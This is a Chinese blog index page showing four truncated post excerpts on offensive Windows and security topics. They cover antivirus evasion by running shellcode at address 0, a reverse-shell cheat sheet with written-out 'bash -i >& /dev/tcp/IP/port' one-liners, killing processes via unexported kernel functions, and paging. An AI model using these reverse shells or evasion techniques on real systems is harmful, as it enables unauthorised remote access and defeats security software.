摘要:
本文所有内容均为胡编乱造,如有不正确的地方,随时私信。 实现原理: 0地址通常不可访问,根据这一特性,部分杀软不会检查此处内存,从而绕过部分杀软。 方案一:利用异常处理执行shellcode 0地址的属性 通常情况下0地址不可访问,大小为10000 C0000005访问冲突错误 异常处理 异常处理函 阅读全文
posted @ 2020-12-17 22:41
江流's
阅读(516)
评论(0)
推荐(0)
摘要:
未测试。请勿用于非法用途 Bash TCP bash -i >& /dev/tcp/IP/port 0>&1 /bin/bash -i > /dev/tcp/IP/port 0<& 2>&1 exec 5<>/dev/tcp/IP/port;cat <&5 | while read line; do 阅读全文
posted @ 2020-12-15 14:30
江流's
阅读(127)
评论(0)
推荐(0)
摘要:
利用未导出函数结束进程 本文所有内容均为胡编乱造,如有不正确的地方,随时私信。 知识理论 内核模块 内核模块是什么? 内核模块如何布局的? 暴力搜索 如何通过特征码暴力搜索未导出函数? 内核模块 内核模块是什么? 驱动程序每一个都是一个模块,称为“内核模块”。 都可以加载到内核中 都遵守PE格式。 阅读全文
posted @ 2020-12-11 09:17
江流's
阅读(493)
评论(1)
推荐(2)
摘要:
101012分页设置物理页 include <Windows.h> 阅读全文
posted @ 2020-12-06 14:00
江流's
阅读(120)
评论(0)
推荐(1)
浙公网安备 33010602011771号